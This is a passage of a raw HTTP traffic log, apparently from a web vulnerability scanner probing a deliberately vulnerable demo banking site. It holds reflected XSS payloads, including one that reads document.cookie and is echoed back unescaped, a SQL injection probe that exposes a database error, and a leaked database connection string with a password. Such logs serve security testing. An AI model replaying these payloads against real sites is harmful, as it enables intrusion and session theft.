2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /scripts/weblog HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:30:18 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:16 GMT ETag: "b4fe491aadc11:8f6" Content-Length: 25 blehblehblbhelbhlebghlebh
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:32 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /forgot2.asp?msg2=no&msg=We%2Bcould%2Bnot%2Bfind%2Byour%2Be%2Dmail%2Baddress%2Bin%2Bour%2Bdatabase.%2BPlease%2Bjoin%2Bbelow. HTTP/1.0 Referer: http://zero.webappsecurity.com:80/forgot1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:49 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 1887 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Forgotten Password</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>F&nbsp;O&nbsp;R&nbsp;G&nbsp;O&nbsp;T&nbsp;T&nbsp;E&nbsp;N&nbsp;&nbsp;&nbsp;&nbsp;P&nbsp;A&nbsp;S&nbsp;S&nbsp;W&nbsp;O&nbsp;R&nbsp;D</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center">We+could+not+find+your+e-mail+address+in+our+database.+Please+join+below.</td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#c000ff><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> </form> </Table> </table> </body> </html>
GET /forgot1.asp?get=\' HTTP/1.0 Referer: http://zero.webappsecurity.com:80/forgot.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:54:04 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 361 Content-Type: text/html Cache-control: private <font face="Arial" size=2> <p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression '[user] = '\'''.</font> <p> <font face="Arial" size=2>/forgot1.asp</font><font face="Arial" size=2>, line 8</font>
GET /linking/link1/link2/link3/link4/link5/link6/link7/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:31 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /plink.asp?a=>"><script>alert("XSS")</script>&c=12 HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:36:57 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 198 Content-Type: text/html Cache-control: private <html> <body> <P>The parameter "a" = >"><script>alert("XSS")</script></P> <P>The parameter "c" = 12</P><br> <a href="pindex.asp">Click here to return to index</a> </body> </html>
POST /testing/pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/testing/ Content-Length: 56 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect cboPage=test@<script>alert(document.cookie)</script>.com
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:56:33 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 202 Content-Type: text/html Cache-control: private <html> <body> A user should never see this text<br> this page is a redirect only page. The page that the user selected was test@<script>alert(document.cookie)</script>.com </body> </html>
GET /rootlogin.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:17 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 76 Content-Type: text/html Cache-control: private <html> <body> Invalid Data <br>Please try again. </body> </html>
GET /linking/link1/link2/link3/link4/link5/link6/index.htm HTTP/1.0 Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/index.htm Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:24:23 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:10 GMT ETag: "0b3b1fda9dc11:8f6" Content-Length: 37 <A HREF="./link7/index.htm">Link7</A>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=test@<script>alert(document.cookie)</script>.com&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:54:40 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4022 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=>"'><img%20src="javascript:alert('XSS')"> HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:39 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 3989 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>>"'><img src="javascript:alert('XSS')"></center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/index.htm HTTP/1.0 Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/index.htm Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:24:24 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:11 GMT ETag: "9c9758fea9dc11:8f6" Content-Length: 39 <A HREF="./link11/index.htm">Link11</A>
POST /pformresults.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp.bak Content-Length: 137 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=Swinney
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:48 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 352 Content-Type: text/html Cache-control: private <html> <body> <P>The parameter "txtFirstName" = Joe</P> <P>The parameter "txtLastName" = Swinney</P><br> <P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br> <P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br> <a href="pindex.asp">Click here to return to index</a> </body> </html>
GET /_vti_cnf/document.URL; HTTP/1.0 Referer: http://zero.webappsecurity.com:80/_vti_cnf/ Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:46 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) :